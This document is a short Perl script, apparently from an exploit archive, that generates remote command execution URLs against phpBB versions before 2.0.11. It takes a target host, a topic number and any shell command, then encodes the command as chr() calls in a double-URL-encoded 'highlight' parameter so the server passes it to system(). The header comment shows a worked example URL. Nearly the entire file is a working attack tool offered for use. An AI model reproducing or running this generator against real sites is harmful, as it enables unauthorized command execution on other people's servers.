
  1. #!/usr/bin/perl -w
  2. # Code that automate the creation of the URL to exploit phpBB < 2.0.11
  3. # Discovered by Zeelock and descibed at http://www.securityfocus.com/bid/10701
  4. # and http://www.packetstormsecurity.org/0411-exploits/phpbb2011.txt
  5. # Fix: http://www.securityfocus.com/bid/10701/solution/
  6. #
  7. # Example of execution:
  8. #
  9. # Insert the hostname of the target, with, if necessary,
  10. # the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): http://www.hostname.com/phpbb/
  11. # Insert a valid topic number (viewtopic.php?t=[topic_number]): 542
  12. # Insert the command to execute on the target: uname -a
  13. # This is the final URL: http://www.hostname.com/phpbb/viewtopic.php?t=542&highlight=%2527%252esystem(chr(117)
  14. # %252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
  15. #
  16. # by albythebest - http://albythebest.altervista.org/
  17.  
  18. print "#########################################################\n";
  19. print "# phpBB < 2.0.11 Vulnerability URL Creator - BID: 10701 #\n";
  20. print "#########################################################\n";
  21. print "           http://albythebest.altervista.org/\n\n";
  22. print "Insert the hostname of the target, with, if necessary,
  23. the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): ";
  24. $host=<stdin>;
  25. chomp $host;
  26. print "Insert a valid topic number (viewtopic.php?t=[topic_number]): ";
  27. $topic=<stdin>;
  28. chomp $topic;
  29. print "Insert the command to execute on the target: ";
  30. $comando=<stdin>;
  31. chomp $comando;
  32. @command=split(//,$comando);
  33. print "This is the final URL: ",$host,"viewtopic.php?t=",$topic,"&highlight=%2527%252esystem(chr(";
  34. print ord("$command[0]");
  35. for($indice=1;$indice<@command;$indice++) {
  36.   print ")%252echr(",ord("$command[$indice]");
  37. }
  38. print "))%252e%2527\n";